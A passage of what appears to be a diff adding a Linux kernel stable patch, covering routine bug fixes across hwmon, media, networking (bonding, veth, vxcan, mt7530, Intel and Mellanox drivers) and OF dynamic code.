+ 				 HID_REQ_SET_REPORT);
++
++record_access_and_ret:
++	priv->last_ctrl_report_op = ktime_get();
++
+ 	return ret;
+ }
+ 
+@@ -853,6 +884,7 @@ static int aqc_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 		priv->virtual_temp_sensor_start_offset = D5NEXT_VIRTUAL_SENSORS_START;
+ 		priv->power_cycle_count_offset = D5NEXT_POWER_CYCLES;
+ 		priv->buffer_size = D5NEXT_CTRL_REPORT_SIZE;
++		priv->ctrl_report_delay = CTRL_REPORT_DELAY;
+ 
+ 		priv->temp_label = label_d5next_temp;
+ 		priv->virtual_temp_label = label_virtual_temp_sensors;
+@@ -893,6 +925,7 @@ static int aqc_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 		priv->virtual_temp_sensor_start_offset = OCTO_VIRTUAL_SENSORS_START;
+ 		priv->power_cycle_count_offset = OCTO_POWER_CYCLES;
+ 		priv->buffer_size = OCTO_CTRL_REPORT_SIZE;
++		priv->ctrl_report_delay = CTRL_REPORT_DELAY;
+ 
+ 		priv->temp_label = label_temp_sensors;
+ 		priv->virtual_temp_label = label_virtual_temp_sensors;
+@@ -913,6 +946,7 @@ static int aqc_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 		priv->virtual_temp_sensor_start_offset = QUADRO_VIRTUAL_SENSORS_START;
+ 		priv->power_cycle_count_offset = QUADRO_POWER_CYCLES;
+ 		priv->buffer_size = QUADRO_CTRL_REPORT_SIZE;
++		priv->ctrl_report_delay = CTRL_REPORT_DELAY;
+ 		priv->flow_sensor_offset = QUADRO_FLOW_SENSOR_OFFSET;
+ 
+ 		priv->temp_label = label_temp_sensors;
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_enc.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_enc.c
+index d810a78dde51d..31e3c37662185 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_enc.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_enc.c
+@@ -821,6 +821,8 @@ static int vb2ops_venc_queue_setup(struct vb2_queue *vq,
+ 		return -EINVAL;
+ 
+ 	if (*nplanes) {
++		if (*nplanes != q_data->fmt->num_planes)
++			return -EINVAL;
+ 		for (i = 0; i < *nplanes; i++)
+ 			if (sizes[i] < q_data->sizeimage[i])
+ 				return -EINVAL;
+diff --git a/drivers/net/bonding/bond_alb.c b/drivers/net/bonding/bond_alb.c
+index b9dbad3a8af82..fc5da5d7744da 100644
+--- a/drivers/net/bonding/bond_alb.c
++++ b/drivers/net/bonding/bond_alb.c
+@@ -660,10 +660,10 @@ static struct slave *rlb_arp_xmit(struct sk_buff *skb, struct bonding *bond)
+ 		return NULL;
+ 	arp = (struct arp_pkt *)skb_network_header(skb);
+ 
+-	/* Don't modify or load balance ARPs that do not originate locally
+-	 * (e.g.,arrive via a bridge).
++	/* Don't modify or load balance ARPs that do not originate
++	 * from the bond itself or a VLAN directly above the bond.
+ 	 */
+-	if (!bond_slave_has_mac_rx(bond, arp->mac_src))
++	if (!bond_slave_has_mac_rcu(bond, arp->mac_src))
+ 		return NULL;
+ 
+ 	dev = ip_dev_find(dev_net(bond->dev), arp->ip_src);
+diff --git a/drivers/net/can/vxcan.c b/drivers/net/can/vxcan.c
+index 26a472d2ea583..6d549dbdb4674 100644
+--- a/drivers/net/can/vxcan.c
++++ b/drivers/net/can/vxcan.c
+@@ -192,12 +192,7 @@ static int vxcan_newlink(struct net *net, struct net_device *dev,
+ 
+ 		nla_peer = data[VXCAN_INFO_PEER];
+ 		ifmp = nla_data(nla_peer);
+-		err = rtnl_nla_parse_ifla(peer_tb,
+-					  nla_data(nla_peer) +
+-					  sizeof(struct ifinfomsg),
+-					  nla_len(nla_peer) -
+-					  sizeof(struct ifinfomsg),
+-					  NULL);
++		err = rtnl_nla_parse_ifinfomsg(peer_tb, nla_peer, extack);
+ 		if (err < 0)
+ 			return err;
+ 
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 51d2ef0dc835c..b988c8a40d536 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -1005,6 +1005,10 @@ mt753x_trap_frames(struct mt7530_priv *priv)
+ 	mt7530_rmw(priv, MT753X_BPC, MT753X_BPDU_PORT_FW_MASK,
+ 		   MT753X_BPDU_CPU_ONLY);
+ 
++	/* Trap 802.1X PAE frames to the CPU port(s) */
++	mt7530_rmw(priv, MT753X_BPC, MT753X_PAE_PORT_FW_MASK,
++		   MT753X_PAE_PORT_FW(MT753X_BPDU_CPU_ONLY));
++
+ 	/* Trap LLDP frames with :0E MAC DA to the CPU port(s) */
+ 	mt7530_rmw(priv, MT753X_RGAC2, MT753X_R0E_PORT_FW_MASK,
+ 		   MT753X_R0E_PORT_FW(MT753X_BPDU_CPU_ONLY));
+diff --git a/drivers/net/dsa/mt7530.h b/drivers/net/dsa/mt7530.h
+index 9a45663d8b4ef..6202b0f8c3f34 100644
+--- a/drivers/net/dsa/mt7530.h
++++ b/drivers/net/dsa/mt7530.h
+@@ -64,6 +64,8 @@ enum mt753x_id {
+ /* Registers for BPDU and PAE frame control*/
+ #define MT753X_BPC			0x24
+ #define  MT753X_BPDU_PORT_FW_MASK	GENMASK(2, 0)
++#define  MT753X_PAE_PORT_FW_MASK	GENMASK(18, 16)
++#define  MT753X_PAE_PORT_FW(x)		FIELD_PREP(MT753X_PAE_PORT_FW_MASK, x)
+ 
+ /* Register for :03 and :0E MAC DA frame control */
+ #define MT753X_RGAC2			0x2c
+diff --git a/drivers/net/dsa/ocelot/felix_vsc9959.c b/drivers/net/dsa/ocelot/felix_vsc9959.c
+index 5f6af0870dfd6..0186482194d20 100644
+--- a/drivers/net/dsa/ocelot/felix_vsc9959.c
++++ b/drivers/net/dsa/ocelot/felix_vsc9959.c
+@@ -1071,6 +1071,9 @@ static u64 vsc9959_tas_remaining_gate_len_ps(u64 gate_len_ns)
+ 	if (gate_len_ns == U64_MAX)
+ 		return U64_MAX;
+ 
++	if (gate_len_ns < VSC9959_TAS_MIN_GATE_LEN_NS)
++		return 0;
++
+ 	return (gate_len_ns - VSC9959_TAS_MIN_GATE_LEN_NS) * PSEC_PER_NSEC;
+ }
+ 
+diff --git a/drivers/net/ethernet/broadcom/bgmac.c b/drivers/net/ethernet/broadcom/bgmac.c
+index 10c7c232cc4ec..52ee3751187a2 100644
+--- a/drivers/net/ethernet/broadcom/bgmac.c
++++ b/drivers/net/ethernet/broadcom/bgmac.c
+@@ -1448,7 +1448,7 @@ int bgmac_phy_connect_direct(struct bgmac *bgmac)
+ 	int err;
+ 
+ 	phy_dev = fixed_phy_register(PHY_POLL, &fphy_status, NULL);
+-	if (!phy_dev || IS_ERR(phy_dev)) {
++	if (IS_ERR(phy_dev)) {
+ 		dev_err(bgmac->dev, "Failed to register fixed PHY device\n");
+ 		return -ENODEV;
+ 	}
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmmii.c b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+index 1fe8038587ac8..1779ee524dac7 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmmii.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+@@ -608,7 +608,7 @@ static int bcmgenet_mii_pd_init(struct bcmgenet_priv *priv)
+ 		};
+ 
+ 		phydev = fixed_phy_register(PHY_POLL, &fphy_status, NULL);
+-		if (!phydev || IS_ERR(phydev)) {
++		if (IS_ERR(phydev)) {
+ 			dev_err(kdev, "failed to register fixed PHY device\n");
+ 			return -ENODEV;
+ 		}
+diff --git a/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c b/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c
+index c2e7037c7ba1c..7750702900fa6 100644
+--- a/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c
++++ b/drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c
+@@ -1466,7 +1466,7 @@ static void make_established(struct sock *sk, u32 snd_isn, unsigned int opt)
+ 	tp->write_seq = snd_isn;
+ 	tp->snd_nxt = snd_isn;
+ 	tp->snd_una = snd_isn;
+-	inet_sk(sk)->inet_id = get_random_u16();
++	atomic_set(&inet_sk(sk)->inet_id, get_random_u16());
+ 	assign_rxopt(sk, opt);
+ 
+ 	if (tp->rcv_wnd > (RCV_BUFSIZ_M << 10))
+diff --git a/drivers/net/ethernet/ibm/ibmveth.c b/drivers/net/ethernet/ibm/ibmveth.c
+index 5b96cd94dcd24..0b4ec6e41eb41 100644
+--- a/drivers/net/ethernet/ibm/ibmveth.c
++++ b/drivers/net/ethernet/ibm/ibmveth.c
+@@ -203,7 +203,7 @@ static inline void ibmveth_flush_buffer(void *addr, unsigned long length)
+ 	unsigned long offset;
+ 
+ 	for (offset = 0; offset < length; offset += SMP_CACHE_BYTES)
+-		asm("dcbfl %0,%1" :: "b" (addr), "r" (offset));
++		asm("dcbf %0,%1,1" :: "b" (addr), "r" (offset));
+ }
+ 
+ /* replenish the buffers for a pool.  note that we don't need to
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 0e01b1927c1c6..08ccf0024ce1a 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -2615,7 +2615,7 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 			retval = i40e_correct_mac_vlan_filters
+ 				(vsi, &tmp_add_list, &tmp_del_list,
+ 				 vlan_filters);
+-		else
++		else if (pf->vf)
+ 			retval = i40e_correct_vf_mac_vlan_filters
+ 				(vsi, &tmp_add_list, &tmp_del_list,
+ 				 vlan_filters, pf->vf[vsi->vf_id].trusted);
+@@ -2788,7 +2788,8 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 	}
+ 
+ 	/* if the VF is not trusted do not do promisc */
+-	if ((vsi->type == I40E_VSI_SRIOV) && !pf->vf[vsi->vf_id].trusted) {
++	if (vsi->type == I40E_VSI_SRIOV && pf->vf &&
++	    !pf->vf[vsi->vf_id].trusted) {
+ 		clear_bit(__I40E_VSI_OVERFLOW_PROMISC, vsi->state);
+ 		goto out;
+ 	}
+diff --git a/drivers/net/ethernet/intel/ice/ice_base.c b/drivers/net/ethernet/intel/ice/ice_base.c
+index e864634d66bc6..818eca6aa4a41 100644
+--- a/drivers/net/ethernet/intel/ice/ice_base.c
++++ b/drivers/net/ethernet/intel/ice/ice_base.c
+@@ -396,7 +396,8 @@ static int ice_setup_rx_ctx(struct ice_rx_ring *ring)
+ 	/* Receive Packet Data Buffer Size.
+ 	 * The Packet Data Buffer Size is defined in 128 byte units.
+ 	 */
+-	rlan_ctx.dbuf = ring->rx_buf_len >> ICE_RLAN_CTX_DBUF_S;
++	rlan_ctx.dbuf = DIV_ROUND_UP(ring->rx_buf_len,
++				     BIT_ULL(ICE_RLAN_CTX_DBUF_S));
+ 
+ 	/* use 32 byte descriptors */
+ 	rlan_ctx.dsize = 1;
+diff --git a/drivers/net/ethernet/intel/ice/ice_sriov.c b/drivers/net/ethernet/intel/ice/ice_sriov.c
+index b8c31bf721ad1..b719e9a771e36 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sriov.c
++++ b/drivers/net/ethernet/intel/ice/ice_sriov.c
+@@ -1240,7 +1240,7 @@ int ice_set_vf_spoofchk(struct net_device *netdev, int vf_id, bool ena)
+ 	if (!vf)
+ 		return -EINVAL;
+ 
+-	ret = ice_check_vf_ready_for_reset(vf);
++	ret = ice_check_vf_ready_for_cfg(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+@@ -1355,7 +1355,7 @@ int ice_set_vf_mac(struct net_device *netdev, int vf_id, u8 *mac)
+ 		goto out_put_vf;
+ 	}
+ 
+-	ret = ice_check_vf_ready_for_reset(vf);
++	ret = ice_check_vf_ready_for_cfg(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+@@ -1409,7 +1409,7 @@ int ice_set_vf_trust(struct net_device *netdev, int vf_id, bool trusted)
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	ret = ice_check_vf_ready_for_reset(vf);
++	ret = ice_check_vf_ready_for_cfg(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+@@ -1722,7 +1722,7 @@ ice_set_vf_port_vlan(struct net_device *netdev, int vf_id, u16 vlan_id, u8 qos,
+ 	if (!vf)
+ 		return -EINVAL;
+ 
+-	ret = ice_check_vf_ready_for_reset(vf);
++	ret = ice_check_vf_ready_for_cfg(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_vf_lib.c b/drivers/net/ethernet/intel/ice/ice_vf_lib.c
+index 71047fc341392..9dbe6e9bb1f79 100644
+--- a/drivers/net/ethernet/intel/ice/ice_vf_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_vf_lib.c
+@@ -185,25 +185,6 @@ int ice_check_vf_ready_for_cfg(struct ice_vf *vf)
+ 	return 0;
+ }
+ 
+-/**
+- * ice_check_vf_ready_for_reset - check if VF is ready to be reset
+- * @vf: VF to check if it's ready to be reset
+- *
+- * The purpose of this function is to ensure that the VF is not in reset,
+- * disabled, and is both initialized and active, thus enabling us to safely
+- * initialize another reset.
+- */
+-int ice_check_vf_ready_for_reset(struct ice_vf *vf)
+-{
+-	int ret;
+-
+-	ret = ice_check_vf_ready_for_cfg(vf);
+-	if (!ret && !test_bit(ICE_VF_STATE_ACTIVE, vf->vf_states))
+-		ret = -EAGAIN;
+-
+-	return ret;
+-}
+-
+ /**
+  * ice_trigger_vf_reset - Reset a VF on HW
+  * @vf: pointer to the VF structure
+@@ -588,11 +569,17 @@ int ice_reset_vf(struct ice_vf *vf, u32 flags)
+ 		return 0;
+ 	}
+ 
++	if (flags & ICE_VF_RESET_LOCK)
++		mutex_lock(&vf->cfg_lock);
++	else
++		lockdep_assert_held(&vf->cfg_lock);
++
+ 	if (ice_is_vf_disabled(vf)) {
+ 		vsi = ice_get_vf_vsi(vf);
+ 		if (!vsi) {
+ 			dev_dbg(dev, "VF is already removed\n");
+-			return -EINVAL;
++			err = -EINVAL;
++			goto out_unlock;
+ 		}
+ 		ice_vsi_stop_lan_tx_rings(vsi, ICE_NO_RESET, vf->vf_id);
+ 
+@@ -601,14 +588,9 @@ int ice_reset_vf(struct ice_vf *vf, u32 flags)
+ 
+ 		dev_dbg(dev, "VF is already disabled, there is no need for resetting it, telling VM, all is fine %d\n",
+ 			vf->vf_id);
+-		return 0;
++		goto out_unlock;
+ 	}
+ 
+-	if (flags & ICE_VF_RESET_LOCK)
+-		mutex_lock(&vf->cfg_lock);
+-	else
+-		lockdep_assert_held(&vf->cfg_lock);
+-
+ 	/* Set VF disable bit state here, before triggering reset */
+ 	set_bit(ICE_VF_STATE_DIS, vf->vf_states);
+ 	ice_trigger_vf_reset(vf, flags & ICE_VF_RESET_VFLR, false);
+diff --git a/drivers/net/ethernet/intel/ice/ice_vf_lib.h b/drivers/net/ethernet/intel/ice/ice_vf_lib.h
+index e5bed85724622..9f7fcd8e5714b 100644
+--- a/drivers/net/ethernet/intel/ice/ice_vf_lib.h
++++ b/drivers/net/ethernet/intel/ice/ice_vf_lib.h
+@@ -214,7 +214,6 @@ u16 ice_get_num_vfs(struct ice_pf *pf);
+ struct ice_vsi *ice_get_vf_vsi(struct ice_vf *vf);
+ bool ice_is_vf_disabled(struct ice_vf *vf);
+ int ice_check_vf_ready_for_cfg(struct ice_vf *vf);
+-int ice_check_vf_ready_for_reset(struct ice_vf *vf);
+ void ice_set_vf_state_dis(struct ice_vf *vf);
+ bool ice_is_any_vf_in_unicast_promisc(struct ice_pf *pf);
+ void
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl.c b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+index ef3c709d6a750..2b4c791b6cbad 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+@@ -3722,7 +3722,6 @@ error_handler:
+ 		ice_vc_notify_vf_link_state(vf);
+ 		break;
+ 	case VIRTCHNL_OP_RESET_VF:
+-		clear_bit(ICE_VF_STATE_ACTIVE, vf->vf_states);
+ 		ops->reset_vf(vf);
+ 		break;
+ 	case VIRTCHNL_OP_ADD_ETH_ADDR:
+diff --git a/drivers/net/ethernet/intel/igb/igb_ptp.c b/drivers/net/ethernet/intel/igb/igb_ptp.c
+index 15e57460e19ea..07171e574e7d7 100644
+--- a/drivers/net/ethernet/intel/igb/igb_ptp.c
++++ b/drivers/net/ethernet/intel/igb/igb_ptp.c
+@@ -1404,18 +1404,6 @@ void igb_ptp_init(struct igb_adapter *adapter)
+ 		return;
+ 	}
+ 
+-	spin_lock_init(&adapter->tmreg_lock);
+-	INIT_WORK(&adapter->ptp_tx_work, igb_ptp_tx_work);
+-
+-	if (adapter->ptp_flags & IGB_PTP_OVERFLOW_CHECK)
+-		INIT_DELAYED_WORK(&adapter->ptp_overflow_work,
+-				  igb_ptp_overflow_check);
+-
+-	adapter->tstamp_config.rx_filter = HWTSTAMP_FILTER_NONE;
+-	adapter->tstamp_config.tx_type = HWTSTAMP_TX_OFF;
+-
+-	igb_ptp_reset(adapter);
+-
+ 	adapter->ptp_clock = ptp_clock_register(&adapter->ptp_caps,
+ 						&adapter->pdev->dev);
+ 	if (IS_ERR(adapter->ptp_clock)) {
+@@ -1425,6 +1413,18 @@ void igb_ptp_init(struct igb_adapter *adapter)
+ 		dev_info(&adapter->pdev->dev, "added PHC on %s\n",
+ 			 adapter->netdev->name);
+ 		adapter->ptp_flags |= IGB_PTP_ENABLED;
++
++		spin_lock_init(&adapter->tmreg_lock);
++		INIT_WORK(&adapter->ptp_tx_work, igb_ptp_tx_work);
++
++		if (adapter->ptp_flags & IGB_PTP_OVERFLOW_CHECK)
++			INIT_DELAYED_WORK(&adapter->ptp_overflow_work,
++					  igb_ptp_overflow_check);
++
++		adapter->tstamp_config.rx_filter = HWTSTAMP_FILTER_NONE;
++		adapter->tstamp_config.tx_type = HWTSTAMP_TX_OFF;
++
++		igb_ptp_reset(adapter);
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/igc/igc_defines.h b/drivers/net/ethernet/intel/igc/igc_defines.h
+index dbfa4b9dee066..90ca01889cd82 100644
+--- a/drivers/net/ethernet/intel/igc/igc_defines.h
++++ b/drivers/net/ethernet/intel/igc/igc_defines.h
+@@ -536,7 +536,7 @@
+ #define IGC_PTM_CTRL_START_NOW	BIT(29) /* Start PTM Now */
+ #define IGC_PTM_CTRL_EN		BIT(30) /* Enable PTM */
+ #define IGC_PTM_CTRL_TRIG	BIT(31) /* PTM Cycle trigger */
+-#define IGC_PTM_CTRL_SHRT_CYC(usec)	(((usec) & 0x2f) << 2)
++#define IGC_PTM_CTRL_SHRT_CYC(usec)	(((usec) & 0x3f) << 2)
+ #define IGC_PTM_CTRL_PTM_TO(usec)	(((usec) & 0xff) << 8)
+ 
+ #define IGC_PTM_SHORT_CYC_DEFAULT	10  /* Default Short/interrupted cycle interval */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 705325431dec3..5541e284cd3f0 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -4005,9 +4005,10 @@ rx_frscfg:
+ 	if (link < 0)
+ 		return NIX_AF_ERR_RX_LINK_INVALID;
+ 
+-	nix_find_link_frs(rvu, req, pcifunc);
+ 
+ linkcfg:
++	nix_find_link_frs(rvu, req, pcifunc);
++
+ 	cfg = rvu_read64(rvu, blkaddr, NIX_AF_RX_LINKX_CFG(link));
+ 	cfg = (cfg & ~(0xFFFFULL << 16)) | ((u64)req->maxlen << 16);
+ 	if (req->update_minlen)
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/core_acl_flex_keys.c b/drivers/net/ethernet/mellanox/mlxsw/core_acl_flex_keys.c
+index bd1a51a0a5408..f208a237d0b52 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/core_acl_flex_keys.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/core_acl_flex_keys.c
+@@ -32,8 +32,8 @@ static const struct mlxsw_afk_element_info mlxsw_afk_element_infos[] = {
+ 	MLXSW_AFK_ELEMENT_INFO_U32(IP_TTL_, 0x18, 0, 8),
+ 	MLXSW_AFK_ELEMENT_INFO_U32(IP_ECN, 0x18, 9, 2),
+ 	MLXSW_AFK_ELEMENT_INFO_U32(IP_DSCP, 0x18, 11, 6),
+-	MLXSW_AFK_ELEMENT_INFO_U32(VIRT_ROUTER_MSB, 0x18, 17, 3),
+-	MLXSW_AFK_ELEMENT_INFO_U32(VIRT_ROUTER_LSB, 0x18, 20, 8),
++	MLXSW_AFK_ELEMENT_INFO_U32(VIRT_ROUTER_MSB, 0x18, 17, 4),
++	MLXSW_AFK_ELEMENT_INFO_U32(VIRT_ROUTER_LSB, 0x18, 21, 8),
+ 	MLXSW_AFK_ELEMENT_INFO_BUF(SRC_IP_96_127, 0x20, 4),
+ 	MLXSW_AFK_ELEMENT_INFO_BUF(SRC_IP_64_95, 0x24, 4),
+ 	MLXSW_AFK_ELEMENT_INFO_BUF(SRC_IP_32_63, 0x28, 4),
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/pci.c b/drivers/net/ethernet/mellanox/mlxsw/pci.c
+index c968309657dd1..51eea1f0529c8 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/pci.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/pci.c
+@@ -517,11 +517,15 @@ static void mlxsw_pci_skb_cb_ts_set(struct mlxsw_pci *mlxsw_pci,
+ 				    struct sk_buff *skb,
+ 				    enum mlxsw_pci_cqe_v cqe_v, char *cqe)
+ {
++	u8 ts_type;
++
+ 	if (cqe_v != MLXSW_PCI_CQE_V2)
+ 		return;
+ 
+-	if (mlxsw_pci_cqe2_time_stamp_type_get(cqe) !=
+-	    MLXSW_PCI_CQE_TIME_STAMP_TYPE_UTC)
++	ts_type = mlxsw_pci_cqe2_time_stamp_type_get(cqe);
++
++	if (ts_type != MLXSW_PCI_CQE_TIME_STAMP_TYPE_UTC &&
++	    ts_type != MLXSW_PCI_CQE_TIME_STAMP_TYPE_MIRROR_UTC)
+ 		return;
+ 
+ 	mlxsw_skb_cb(skb)->cqe_ts.sec = mlxsw_pci_cqe2_time_stamp_sec_get(cqe);
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/reg.h b/drivers/net/ethernet/mellanox/mlxsw/reg.h
+index 0777bed5bb1af..a34ff19c58bd2 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/reg.h
++++ b/drivers/net/ethernet/mellanox/mlxsw/reg.h
+@@ -97,14 +97,6 @@ MLXSW_ITEM32(reg, sspr, m, 0x00, 31, 1);
+  */
+ MLXSW_ITEM32_LP(reg, sspr, 0x00, 16, 0x00, 12);
+ 
+-/* reg_sspr_sub_port
+- * Virtual port within the physical port.
+- * Should be set to 0 when virtual ports are not enabled on the port.
+- *
+- * Access: RW
+- */
+-MLXSW_ITEM32(reg, sspr, sub_port, 0x00, 8, 8);
+-
+ /* reg_sspr_system_port
+  * Unique identifier within the stacking domain that represents all the ports
+  * that are available in the system (external ports).
+@@ -120,7 +112,6 @@ static inline void mlxsw_reg_sspr_pack(char *payload, u16 local_port)
+ 	MLXSW_REG_ZERO(sspr, payload);
+ 	mlxsw_reg_sspr_m_set(payload, 1);
+ 	mlxsw_reg_sspr_local_port_set(payload, local_port);
+-	mlxsw_reg_sspr_sub_port_set(payload, 0);
+ 	mlxsw_reg_sspr_system_port_set(payload, local_port);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum2_mr_tcam.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum2_mr_tcam.c
+index e4f4cded2b6f9..b1178b7a7f51a 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum2_mr_tcam.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum2_mr_tcam.c
+@@ -193,7 +193,7 @@ mlxsw_sp2_mr_tcam_rule_parse(struct mlxsw_sp_acl_rule *rule,
+ 				       key->vrid, GENMASK(7, 0));
+ 	mlxsw_sp_acl_rulei_keymask_u32(rulei,
+ 				       MLXSW_AFK_ELEMENT_VIRT_ROUTER_MSB,
+-				       key->vrid >> 8, GENMASK(2, 0));
++				       key->vrid >> 8, GENMASK(3, 0));
+ 	switch (key->proto) {
+ 	case MLXSW_SP_L3_PROTO_IPV4:
+ 		return mlxsw_sp2_mr_tcam_rule_parse4(rulei, key);
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_flex_keys.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_flex_keys.c
+index 00c32320f8915..173808c096bab 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_flex_keys.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_flex_keys.c
+@@ -169,7 +169,7 @@ static struct mlxsw_afk_element_inst mlxsw_sp_afk_element_info_ipv4_2[] = {
+ 
+ static struct mlxsw_afk_element_inst mlxsw_sp_afk_element_info_ipv4_4[] = {
+ 	MLXSW_AFK_ELEMENT_INST_U32(VIRT_ROUTER_LSB, 0x04, 24, 8),
+-	MLXSW_AFK_ELEMENT_INST_U32(VIRT_ROUTER_MSB, 0x00, 0, 3),
++	MLXSW_AFK_ELEMENT_INST_EXT_U32(VIRT_ROUTER_MSB, 0x00, 0, 3, 0, true),
+ };
+ 
+ static struct mlxsw_afk_element_inst mlxsw_sp_afk_element_info_ipv6_0[] = {
+@@ -319,7 +319,7 @@ static struct mlxsw_afk_element_inst mlxsw_sp_afk_element_info_mac_5b[] = {
+ 
+ static struct mlxsw_afk_element_inst mlxsw_sp_afk_element_info_ipv4_4b[] = {
+ 	MLXSW_AFK_ELEMENT_INST_U32(VIRT_ROUTER_LSB, 0x04, 13, 8),
+-	MLXSW_AFK_ELEMENT_INST_EXT_U32(VIRT_ROUTER_MSB, 0x04, 21, 4, 0, true),
++	MLXSW_AFK_ELEMENT_INST_U32(VIRT_ROUTER_MSB, 0x04, 21, 4),
+ };
+ 
+ static struct mlxsw_afk_element_inst mlxsw_sp_afk_element_info_ipv6_2b[] = {
+diff --git a/drivers/net/ipvlan/ipvlan_main.c b/drivers/net/ipvlan/ipvlan_main.c
+index 796a38f9d7b24..cd16bc8bf154c 100644
+--- a/drivers/net/ipvlan/ipvlan_main.c
++++ b/drivers/net/ipvlan/ipvlan_main.c
+@@ -748,7 +748,8 @@ static int ipvlan_device_event(struct notifier_block *unused,
+ 
+ 		write_pnet(&port->pnet, newnet);
+ 
+-		ipvlan_migrate_l3s_hook(oldnet, newnet);
++		if (port->mode == IPVLAN_MODE_L3S)
++			ipvlan_migrate_l3s_hook(oldnet, newnet);
+ 		break;
+ 	}
+ 	case NETDEV_UNREGISTER:
+diff --git a/drivers/net/veth.c b/drivers/net/veth.c
+index a71786b3e7ba7..727b9278b9fe5 100644
+--- a/drivers/net/veth.c
++++ b/drivers/net/veth.c
+@@ -1716,10 +1716,7 @@ static int veth_newlink(struct net *src_net, struct net_device *dev,
+ 
+ 		nla_peer = data[VETH_INFO_PEER];
+ 		ifmp = nla_data(nla_peer);
+-		err = rtnl_nla_parse_ifla(peer_tb,
+-					  nla_data(nla_peer) + sizeof(struct ifinfomsg),
+-					  nla_len(nla_peer) - sizeof(struct ifinfomsg),
+-					  NULL);
++		err = rtnl_nla_parse_ifinfomsg(peer_tb, nla_peer, extack);
+ 		if (err < 0)
+ 			return err;
+ 
+diff --git a/drivers/of/dynamic.c b/drivers/of/dynamic.c
+index cd3821a6444f0..4e436f2d13aeb 100644
+--- a/drivers/of/dynamic.c
++++ b/drivers/of/dynamic.c
+@@ -63,15 +63,14 @@ int of_reconfig_notifier_unregister(struct notifier_block *nb)
+ }
+ EXPORT_SYMBOL_GPL(of_reconfig_notifier_unregister);
+ 
+-#ifdef DEBUG
+-const char *action_names[] = {
++static const char *action_names[] = {
++	[0] = "INVALID",
+ 	[OF_RECONFIG_ATTACH_NODE] = "ATTACH_NODE",
+ 	[OF_RECONFIG_DETACH_NODE] = "DETACH_NODE",
+ 	[OF_RECONFIG_ADD_PROPERTY] = "ADD_PROPERTY",
+ 	[OF_RECONFIG_REMOVE_PROPERTY] = "REMOVE_PROPERTY",
+ 	[OF_RECONFIG_UPDATE_PROPERTY] = "UPDATE_PROPERTY",
+ };
+-#endif
+ 
+ int of_reconfig_notify(unsigned long action, struct of_reconfig_data *p)
+ {
+@@ -594,21 +593,9 @@ static int __of_changeset_entry_apply(struct of_changeset_entry *ce)
+ 		}
+ 
+ 		ret = __of_add_property(ce->np, ce->prop);
+-		if (ret) {
+-			pr_err("changeset: add_property failed @%pOF/%s\n",
+-				ce->np,
+-				ce->prop->name);
+-			break;
+-		}
+ 		break;
+ 	case OF_RECONFIG_REMOVE_PROPERTY:
+ 		ret = __of_remove_property(ce->np, ce->prop);
+-		if (ret) {
+-			pr_err("changeset: remove_property failed @%pOF/%s\n",
+-				ce->np,
+-				ce->prop->name);
+-			break;
+-		}
+ 		break;
+ 
+ 	case OF_RECONFIG_UPDATE_PROPERTY:
+@@ -622,20 +609,17 @@ static int __of_changeset_entry_apply(struct of_changeset_entry *ce)
+ 		}
+ 
+ 		ret = __of_update_property(ce->np, ce->prop, &old_prop);
+-		if (ret) {
